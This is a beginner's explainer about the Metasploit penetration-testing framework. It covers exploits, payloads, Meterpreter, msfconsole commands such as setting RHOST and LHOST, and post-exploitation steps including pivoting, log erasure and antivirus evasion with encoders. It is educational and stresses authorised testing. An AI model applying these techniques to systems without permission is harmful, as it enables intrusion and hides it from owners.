Metasploit is the world's most used tool for testing computer security. It lets you act like an attacker to see if your defenses actually work.
Think of a computer network like a massive office building with thousands of doors and windows.
If you own this building, you want to make sure every door is locked. But how can you be sure? You hire a security guard to walk around and physically push on every single door handle.
Metasploit is the ultimate toolkit for that security guard.
Instead of pushing on doors with their hands, the guard uses Metasploit. It is a giant collection of digital tools designed to check if a computer system has open doors, weak locks, or broken windows.
The Broken Lock
A vulnerability is a mistake or a bug in a computer system. It is the exact spot where the defense is weak. It is the broken lock on the back door of the building.
The Skeleton Key
An exploit is a specific piece of code used to break through that exact vulnerability. If the vulnerability is the broken lock, the exploit is the tool used to pick it.
The Package
The payload is what you do *after* you break the lock. It is the code that runs inside the system once the door is open. It might give you control of the computer or let you look around.
Scan the network to see which computers are turned on and what software they are running.
Look in Metasploit's giant list to find an exploit that matches the software the target is running.
Decide what you want to happen when you get in. Do you want a command screen? Do you want to add a user?
Run the test. Metasploit sends the exploit, opens the door, and drops the payload inside.
Metasploit is powerful because it comes with a built-in library. It knows about thousands of past mistakes made by software companies.
* Users can search this database instantly to find the exact tool they need.
We talked about payloads earlier. The most famous payload in Metasploit is called Meterpreter.
When you use an exploit to break into a system, normal tools leave a messy trail. Meterpreter is different. It is a special, invisible command screen.
meterpreter > sysinfo Computer : TARGET-SERVER-01 OS : Windows Server Architecture : x64 Meterpreter : x64/windows meterpreter > getuid Server username : NT AUTHORITY\SYSTEM
Getting in is only the first step. Metasploit has a whole section dedicated to what you do next. This is called "Post-Exploitation". Here is what testers do to prove the system is at risk:
Download a list of everyone who uses that computer to see if any passwords are weak.
Take a secret screenshot of the screen to prove you have full access to the machine.
Use the compromised computer as a bridge to attack other computers hidden deep inside the building.
Erase the system logs so the computer has no record that the tester was ever there.
The battering rams. Programs that take advantage of a specific weakness to break into a system.
The cargo. The code that actually runs on the target system after the exploit opens the door.
The binoculars. Scanners and tools used to look around and gather information without actually attacking.
The disguises. Tools that mix up the code so that antivirus programs cannot recognize it as bad.
Imagine a hospital hires a security tester to check their systems. Here is how they use Metasploit:
The tester uses an Auxiliary module to scan the hospital's network. They find an old computer running a very old version of Windows.
They search Metasploit for an Exploit that works on that old Windows version. They attach a Meterpreter Payload to it.
They fire the attack. The exploit works, and the tester gets a command screen on their laptop. They are inside the old computer.
The tester takes a screenshot to prove they got in. They stop the test, write a report, and the hospital updates the old computer to fix the broken lock.
Metasploit was created in 2003 by a programmer named H.D. Moore. It started as a free, open-source project—meaning anyone in the world could help build it.
Eventually, a security company called Rapid7 purchased the project. However, they kept the core engine free. Today, a massive community of researchers still adds new exploits to it every single day.
2003
Year Created
100% Free
The original tool. It is controlled entirely by typing commands into a black terminal screen. It has no buttons or menus. You must know what you are doing.
Paid Enterprise Tool
The version used by large companies. It provides a visual website interface with buttons, graphs, and automatic report generators. It does the exact same things under the hood.
Professionals control Metasploit using a tool called msfconsole. It is a text-only screen where you type instructions. When you launch it, you see a summary of all the tools loaded and a flashing cursor waiting for your command.
+-------------------------------------------------------+
| METASPLOIT FRAMEWORK |
+-------------------------------------------------------+
=[ metasploit v6.3.5 ]
+ -- --=[ 2294 exploits - 1201 auxiliary - 409 payloads ]
msf6 > _
With thousands of exploits, you need a way to filter them. Metasploit has a built-in search engine.
Example Command:
This tells Metasploit: "Show me all the tools that are exploits designed to attack a Windows system."
When you load an exploit, you must tell it exactly where to go and where to report back. You do this by setting two crucial variables.
Remote Host (Their Address)
This is the IP address of the computer you are testing. It tells the exploit exactly which building to attack.
set RHOST 192.168.1.50
Local Host (Your Address)
This is your computer's IP address. When the door opens, the payload needs to know where to phone home.
set LHOST 192.168.1.10
A Session is an active connection to a target. If you break into 3 different computers, you have 3 sessions running.
You can put these sessions in the background, like minimizing a window on your desktop, and jump between them whenever you want without losing access.
msf6 > sessions -l
Workspace 1
* Active
Workspace 3
If you are testing a hospital on Monday and a bank on Tuesday, you do not want the data to mix. Workspaces act like separate project folders to keep all your found bugs completely isolated.
Typing commands is hard for beginners. Because of this, developers built Armitage. It is an add-on tool that draws a visual map of the network on your screen.
Computers look like little monitor icons. When you successfully break into one, the monitor turns red and gets lightning bolts around it, showing you exactly what you control visually.
Compromised
Antivirus programs look for known patterns. If an exploit looks like a known threat, the antivirus blocks it. Metasploit uses Encoders to scramble the exploit like a secret code.
Blocked by Antivirus
Scrambled by Encoder
Unscrambles & Runs Inside
You should never test systems you do not own. So how do you learn? The creators of Metasploit built a fake computer system called Metasploitable. It is a system built entirely out of broken locks. You download it, run it safely inside your own computer, and practice attacking it without breaking any laws.
Never attack a system you do not own.
Metasploit is a tool. Like a hammer, you can use it to build a house or break a window. Professionals use Metasploit for Ethical Hacking. This means they only test systems when the owner has given them strict, written permission. The goal is always to find the hole and fix it before the bad guys find it.